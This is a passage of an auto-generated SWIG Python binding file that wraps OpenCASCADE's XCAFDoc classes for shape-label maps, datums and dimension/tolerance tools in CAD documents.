_XCAFDoc.Handle_XCAFDoc_ColorTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_ColorTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_ColorTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_Nullify,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_IsNull,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool_GetObject,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ColorTool__kill_pointed,None,Handle_XCAFDoc_ColorTool)
Handle_XCAFDoc_ColorTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ColorTool_swigregister
Handle_XCAFDoc_ColorTool_swigregister(Handle_XCAFDoc_ColorTool)
def Handle_XCAFDoc_ColorTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast(*args)
Handle_XCAFDoc_ColorTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ColorTool_DownCast
class XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel(OCC.TCollection.TCollection_BasicMapIterator):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param aMap:
:type aMap: XCAFDoc_DataMapOfShapeLabel &
:rtype: None
"""
_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel(*args))
def Initialize(self, *args):
"""
:param aMap:
:type aMap: XCAFDoc_DataMapOfShapeLabel &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Initialize(self, *args)
def Key(self, *args):
"""
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Key(self, *args)
def Value(self, *args):
"""
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Value(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Initialize = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Initialize,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Key = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Key,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel.Value = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_Value,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister
XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel_swigregister(XCAFDoc_DataMapIteratorOfDataMapOfShapeLabel)
class XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(OCC.TCollection.TCollection_MapNode):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:param I:
:type I: TDF_Label &
:param n:
:type n: TCollection_MapNodePtr &
:rtype: None
"""
_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(*args))
def Key(self, *args):
"""
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Key(self, *args)
def Value(self, *args):
"""
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Value(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel self)"""
return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel self) -> Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel"""
return _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Key = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Key,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Value = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Value,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetHandle,None,XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister
XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister(XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
class Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(OCC.TCollection.Handle_TCollection_MapNode):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_Nullify,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_IsNull,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_GetObject,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel__kill_pointed,None,Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister = _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_swigregister(Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel)
def Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast(*args)
Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast = _XCAFDoc.Handle_XCAFDoc_DataMapNodeOfDataMapOfShapeLabel_DownCast
class XCAFDoc_DataMapOfShapeLabel(OCC.TCollection.TCollection_BasicMap):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param NbBuckets: default value is 1
:type NbBuckets: int
:rtype: None
"""
_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_swiginit(self,_XCAFDoc.new_XCAFDoc_DataMapOfShapeLabel(*args))
def Assign(self, *args):
"""
:param Other:
:type Other: XCAFDoc_DataMapOfShapeLabel &
:rtype: XCAFDoc_DataMapOfShapeLabel
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Assign(self, *args)
def Set(self, *args):
"""
:param Other:
:type Other: XCAFDoc_DataMapOfShapeLabel &
:rtype: XCAFDoc_DataMapOfShapeLabel
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Set(self, *args)
def ReSize(self, *args):
"""
:param NbBuckets:
:type NbBuckets: int
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ReSize(self, *args)
def Clear(self, *args):
"""
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Clear(self, *args)
def Bind(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:param I:
:type I: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Bind(self, *args)
def IsBound(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_IsBound(self, *args)
def UnBind(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_UnBind(self, *args)
def Find(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find(self, *args)
def ChangeFind(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind(self, *args)
def Find1(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: Standard_Address
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find1(self, *args)
def ChangeFind1(self, *args):
"""
:param K:
:type K: TopoDS_Shape &
:rtype: Standard_Address
"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind1(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_DataMapOfShapeLabel self)"""
return _XCAFDoc.XCAFDoc_DataMapOfShapeLabel__kill_pointed(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DataMapOfShapeLabel.Assign = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Assign,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Set = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Set,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ReSize = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ReSize,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Clear = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Clear,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Bind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Bind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.IsBound = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_IsBound,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.UnBind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_UnBind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Find = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ChangeFind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Find1 = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find1,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ChangeFind1 = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind1,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_swigregister
XCAFDoc_DataMapOfShapeLabel_swigregister(XCAFDoc_DataMapOfShapeLabel)
class XCAFDoc_Datum(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_Datum_swiginit(self,_XCAFDoc.new_XCAFDoc_Datum(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Datum_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
:param label:
:type label: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:rtype: Handle_XCAFDoc_Datum
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Datum_Set(self, *args)
def GetName(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Datum_GetName(self, *args)
def GetDescription(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Datum_GetDescription(self, *args)
def GetIdentification(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Datum_GetIdentification(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Datum self)"""
return _XCAFDoc.XCAFDoc_Datum__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Datum self) -> Handle_XCAFDoc_Datum"""
return _XCAFDoc.XCAFDoc_Datum_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Datum.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_Set,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetName,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetDescription,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetIdentification = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetIdentification,None,XCAFDoc_Datum)
XCAFDoc_Datum._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Datum__kill_pointed,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetHandle,None,XCAFDoc_Datum)
XCAFDoc_Datum_swigregister = _XCAFDoc.XCAFDoc_Datum_swigregister
XCAFDoc_Datum_swigregister(XCAFDoc_Datum)
def XCAFDoc_Datum_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Datum_GetID(*args)
class Handle_XCAFDoc_Datum(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Datum_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Datum(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Datum_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Datum.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_Nullify,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_IsNull,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_GetObject,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum__kill_pointed,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum_swigregister = _XCAFDoc.Handle_XCAFDoc_Datum_swigregister
Handle_XCAFDoc_Datum_swigregister(Handle_XCAFDoc_Datum)
def Handle_XCAFDoc_Datum_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Datum_DownCast(*args)
Handle_XCAFDoc_Datum_DownCast = _XCAFDoc.Handle_XCAFDoc_Datum_DownCast
class XCAFDoc_DimTol(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_DimTol_swiginit(self,_XCAFDoc.new_XCAFDoc_DimTol(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DimTol_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
:param label:
:type label: TDF_Label &
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: Handle_XCAFDoc_DimTol
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DimTol_Set(self, *args)
def GetKind(self, *args):
"""
:rtype: int
"""
return _XCAFDoc.XCAFDoc_DimTol_GetKind(self, *args)
def GetVal(self, *args):
"""
:rtype: Handle_TColStd_HArray1OfReal
"""
return _XCAFDoc.XCAFDoc_DimTol_GetVal(self, *args)
def GetName(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_DimTol_GetName(self, *args)
def GetDescription(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_DimTol_GetDescription(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_DimTol self)"""
return _XCAFDoc.XCAFDoc_DimTol__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_DimTol self) -> Handle_XCAFDoc_DimTol"""
return _XCAFDoc.XCAFDoc_DimTol_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DimTol.Set = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_Set,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetKind = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetKind,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetVal = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetVal,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetName,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetDescription,None,XCAFDoc_DimTol)
XCAFDoc_DimTol._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol__kill_pointed,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetHandle,None,XCAFDoc_DimTol)
XCAFDoc_DimTol_swigregister = _XCAFDoc.XCAFDoc_DimTol_swigregister
XCAFDoc_DimTol_swigregister(XCAFDoc_DimTol)
def XCAFDoc_DimTol_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DimTol_GetID(*args)
class Handle_XCAFDoc_DimTol(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_DimTol_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DimTol(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DimTol_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_DimTol.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_Nullify,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_IsNull,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_GetObject,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol__kill_pointed,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol_swigregister = _XCAFDoc.Handle_XCAFDoc_DimTol_swigregister
Handle_XCAFDoc_DimTol_swigregister(Handle_XCAFDoc_DimTol)
def Handle_XCAFDoc_DimTol_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_DimTol_DownCast(*args)
Handle_XCAFDoc_DimTol_DownCast = _XCAFDoc.Handle_XCAFDoc_DimTol_DownCast
class XCAFDoc_DimTolTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_DimTolTool_swiginit(self,_XCAFDoc.new_XCAFDoc_DimTolTool(*args))
def Set(*args):
"""
* Creates (if not exist) DimTolTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_DimTolTool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_Set(*args)
Set = staticmethod(Set)
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetID(*args)
GetID = staticmethod(GetID)
def BaseLabel(self, *args):
"""
* returns the label under which colors are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DimTolTool_BaseLabel(self, *args)
def ShapeTool(self, *args):
"""
* Returns internal XCAFDoc_ShapeTool tool
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_ShapeTool(self, *args)
def IsDimTol(self, *args):
"""
* Returns True if label belongs to a dimtoltable and is a DimTol definition
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_IsDimTol(self, *args)
def GetDimTolLabels(self, *args):
"""
* Returns a sequence of D>s currently stored in the DGTtable
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetDimTolLabels(self, *args)
def FindDimTol(self, *args):
"""
* Finds a dimtol definition in a DGTtable and returns its label if found Returns False if dimtol is not found in DGTtable
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param lab:
:type lab: TDF_Label &
:rtype: bool
* Finds a dimtol definition in a DGTtable and returns its label if found (or Null label else)
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DimTolTool_FindDimTol(self, *args)
def AddDimTol(self, *args):
"""
* Adds a dimtol definition to a DGTtable and returns its label
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DimTolTool_AddDimTol(self, *args)
def SetDimTol(self, *args):
"""
* Sets a link with GUID
:param L:
:type L: TDF_Label &
:param DimTolL:
:type DimTolL: TDF_Label &
:rtype: None
* Sets a link with GUID Adds a DimTol as necessary
:param L:
:type L: TDF_Label &
:param kind:
:type kind: int
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DimTolTool_SetDimTol(self, *args)
def GetRefShapeLabel(self, *args):
"""
* Returns ShapeL defined for label DimTolL Returns False if the DimTolL is not in DGTtable
:param DimTolL:
:type DimTolL: TDF_Label &
:param ShapeL:
:type ShapeL: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetRefShapeLabel(self, *args)
def GetRefDGTLabels(self, *args):
"""
* Returns all DimTol labels defined for label ShapeL
:param ShapeL:
:type ShapeL: TDF_Label &
:param DimTols:
:type DimTols: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetRefDGTLabels(self, *args)
def GetDimTol(self, *args):
"""
* Returns dimtol assigned to <DimTolL> Returns False if no such dimtol is assigned
:param DimTolL:
:type DimTolL: TDF_Label &
:param kind:
:type kind: int &
:param aVal:
:type aVal: Handle_TColStd_HArray1OfReal &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetDimTol(self, *args)
def IsDatum(self, *args):
"""
* Returns True if label belongs to a dimtoltable and is a Datum definition
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_IsDatum(self, *args)
def GetDatumLabels(self, *args):
"""
* Returns a sequence of Datumss currently stored in the DGTtable
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetDatumLabels(self, *args)
def FindDatum(self, *args):
"""
* Finds a datum and returns its label if found
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_FindDatum(self, *args)
def AddDatum(self, *args):
"""
* Adds a datum definition to a DGTtable and returns its label
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DimTolTool_AddDatum(self, *args)
def SetDatum(self, *args):
"""
* Sets a link with GUID
:param L:
:type L: TDF_Label &
:param DatumL:
:type DatumL: TDF_Label &
:rtype: None
* Sets a link with GUID for Datum Adds a Datum as necessary Sets connection between Datum and Tolerance
:param L:
:type L: TDF_Label &
:param TolerL:
:type TolerL: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DimTolTool_SetDatum(self, *args)
def GetDatum(self, *args):
"""
* Returns datum assigned to <DatumL> Returns False if no such datum is assigned
